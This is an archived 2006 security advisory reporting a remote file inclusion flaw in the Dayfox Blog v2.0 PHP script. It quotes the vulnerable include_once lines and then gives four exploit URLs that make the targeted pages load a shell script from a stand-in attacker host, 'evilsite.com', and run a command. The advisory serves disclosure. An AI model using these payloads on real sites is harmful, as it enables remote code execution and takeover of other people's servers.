Dayfox Blog v2.0 Remote file include

2006-10-03T00:00:00
ID SECURITYVULNS:DOC:14533
Type securityvulns
Reporter Securityvulns
Modified 2006-10-03T00:00:00

Description

BiyoSecurity.Org

script name : Dayfox Blog v2.0

Risk : High

Regards : Dj ReMix

Thanks : Korsan , Liz0zim

Vulnerable files :

adminlog.php postblog.php index.php index2.php

Vulnerable code :

include_once ($slogin_path . "/slogin_lib.inc.php"); include_once ($slogin_path . "/header.inc.php");

Exploit : http://site.com/[path to script]/edit/adminlog.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/index.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/index2.php?slogin=http://evilsite.com/shell.txt?&cmd=id

http://site.com/[path to script]/edit/postblog.php?slogin=http://evilsite.com/shell.txt?&cmd=id